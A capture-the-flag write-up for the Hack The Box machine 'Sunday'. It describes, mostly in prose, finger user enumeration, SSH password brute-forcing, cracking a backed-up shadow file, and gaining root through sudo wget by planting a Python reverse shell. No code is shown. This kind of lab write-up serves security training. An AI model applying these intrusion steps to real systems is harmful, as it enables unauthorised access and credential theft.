twitter

Hack The Box: Sunday

 

Difficulty: Easy

Machine Creator: ch4p

Tools Used:
NMAP
Finger
Perl script
Metasploit
Patator
Hashcat
Python

 

Network Enumeration

First, we start with full port nmap scan and discover port 79 TCP Finger.

User Discovery
The finger service allows us to view users that are currently logged in.
Currently, there are no users logged in.


We can enumerate users through finger using a Perl script by pentestmonkey.

https://github.com/pentestmonkey/finger-user-enum/blob/master/finger-user-enum.pl


2 discovered users have logged in the past Sammy and Sunny they have login timestamps of April 24 from IP 10.10.14.4

Alternatively, we can run finger enumeration through Metasploit.

After conducting a more in-depth Nmap scan, we can see that ssh is running on port 22022.

SSH Brute force
Now that we have possible usernames we need to discover their passwords. Generally for SSH brute forcing hydra can be used however due to the age of this machine a different tool is required Patator. Patator was able to brute force ssh and discovered sunny’s password as “sunday.”

While attempting to log in through SSH, there was an error for “no matching key exchange method found” the key exchange method had to be specified.

After looking around, I was able to locate the user.txt file in Sammy’s desktop however sunny does not have permission to access the file.


After searching through directories I came across a backup directory with two files one of them turned out to be a backup of the Linux shadow file with the password hashes.

Hash Cracking

After running both Linux password hashes through Hashcat, we are given the passwords as “sunday” and “cooldude!”

Windows version of Hashcat used for graphics card acceleration.

Logged in as user Sammy using password “cooldude!”.

After logging in as Sammy, we can read the user.txt file and get the key.

PRIVILEGE ESCALATION
If we try to elevate to root as Sunny, we can run a file /root/troll.

If we try to elevate to root as Sammy, we can run wget.

Since we know, we can download using wget as root, and we can execute /root/troll as root we can execute an elevated reverse shell.

We can serve the custom troll file from our local computer using python SimpleHTTPServer and then download troll as Sammy.

In the troll file, I’ve included a python reverse shell script.

And now after running “sudo /root/troll” as Sunny, we now have a reverse shell as root.

With root access, we can now view the contents of the root.txt